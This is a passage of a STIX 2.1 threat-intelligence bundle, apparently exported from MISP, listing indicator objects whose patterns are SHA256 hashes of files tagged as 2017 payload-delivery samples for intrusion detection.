"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '5e139ca25b1519cc28a8096cb28d2be69f57b1af037674a81902f9c605777543']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69ff-ae18-4801-a000-41bd950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f40f1dda30d5f959bc21b0049432c53bb06992c7c8fdd5e886a9b3a0fab06877']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a00-edcc-466d-aade-4de5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b2a2d63c68fce4d4bfddd4fd8584b6c638ee26664785df436c48ffa16e177893']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a01-1aac-4baa-b649-4d05950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'fa91599afa18eff9735b0c0328c8cb0fc305f8d924ebb36a609e50e4a6ab256c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a02-8ad0-419c-8fb4-4210950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '0a31bfdc22ff3cea5a160b2c32a98764027be7512ced50825d1be0b93a7e7aa4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a03-9dac-4ef1-87e0-4c74950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '6bd3c86cb1f04d08407fccda35b0dd2fc8bd83a3c10f913dded93b4bbba182c9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a05-99e8-4ca5-8ee8-465f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '0909f8383cd77107234b5c1aa1c80a1f1bc2e8a2832284ff3de6636d5ed16b8a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a06-5d70-4939-bf68-4a2d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '9dde31f29d5180b26eb93dfe2fc07bae76f929b8d3add20fc577033ae234b437']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a07-5bdc-4ad9-a963-4531950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '28e888ec5247511d01df376f4be7e08c64841df37d9846580e87145c8efbbd10']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a08-c7a4-40a2-b069-4dcc950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '5693592ed69ca1cf0a5f8dcf8f548c063da287ce3e164a89df720a39a290feea']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a09-da50-44f8-a65d-430a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '1b6651a523be1c42f779877ad11f3b52130686aad4fd4ecdfbc15afbcea56aa2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a0a-dc3c-446c-9f94-40a6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '6d99f010c237fec5ff022cdf2f0df8b26429c1d5f223ca4f1658fc833c9cef3e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a0b-2fc4-468f-9650-4f96950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '46089e4e9aebf5fd5ad1ffaecb3bee5d7490f2cc53b5ed66b7509282ca29438b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a0c-2758-4c70-8284-48e2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '998481fbb26e890b83e1738ee12281103ca77775a20c1c6f1705eb6552237e3b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a0d-1140-4eb8-895a-4aa9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '4b373c2d50e600fdae5259bbd3e989d002a776c443869b92afeb5d53b73bd1c0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a0f-3400-48d2-a7fb-4500950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '1f376d4c4febcafa6bdcf8877121c20697046c15f71983a9210762fbf3b5455e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a10-2040-4f3d-b9a8-4d69950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '0321f7948476480ab1875ccdeac46c37a58c2f60d63d2a787bdcf292ff2a5685']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a11-a804-4f3f-ac79-44d4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '3bb134617af6f7b0f0c483b315f7ea45b2ed2c4a91005b453c9ec9e86ef0d70b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a12-5104-466f-9ccd-4ee7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'dad5e918c4ce849f682485bd79e097ac097b554daa897b12151b4595d67980aa']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a13-c044-4f4b-8fa6-4389950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '7b801c415f2fb9210c4d89e7d6332c1a812defe78b234d658b60f9337b8f4266']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a14-0a58-4371-8cd8-4ba1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '75285821f9997b304058e8bf76c7c3f9f4abcf47e0dffea73d6256f657b9e778']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a15-cebc-4608-990f-4e22950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '210024ece45a6935da89ab7c5ae3293616679414e96e2157e49f9f607c831bdc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a16-77e0-48db-86b2-478c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '97bbfb81f930d138ff47c3b899eee6917802385b8c8c1626a7679c5cab41c4a2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a18-0504-484b-8814-49d0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'cbc9e5552cda22130cd7a84cd4b3c68e95eb3f8c2e83dd77253bd1822d1f840d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a19-17d4-4688-bbf6-461f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'bf00cd1bc34ce457b0e4a99a8df5b7fda512496dc32f2762923254bc85261afb']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a1a-c044-4c69-8fb1-4d48950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '9de260dcfe2f5a852c0cff238ffc3fe3fc93feff008463af49f68c9f5b5ebc9b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a1b-6e4c-4c0c-a612-4e99950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'cadb1646563a317ac72579e8691c464bab439667811fb0d850bc2e950a3a332c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a1d-af38-4614-9f1e-4aef950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'dd3d708ba8ce177fd1f756ac5eb3347a0ec7cf65706438ea5bbdfe9125b0dbe4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a1e-3660-4168-80f5-4e6b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '31df6ec1089e720c09e29f35ce33203359128c99cc0e4b03ec3e38237e8151ff']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a1f-4a70-4bdd-8e68-4aa8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'e349394a043e11410ed3e7c35c70d85dbb9c5e512b593e51e1acde3b404414a2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a20-6174-483d-ac35-44b7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'dddb5843c775ae47b37fd02c378699b4e250ac32739f30e0949bdaa28050a595']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a21-2354-400a-b048-497a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '42da6fd7f6ba8b90ffd1298d068045c7928cef6506642e69859e0b962b5864a8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6a22-a3a4-4661-b930-473d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
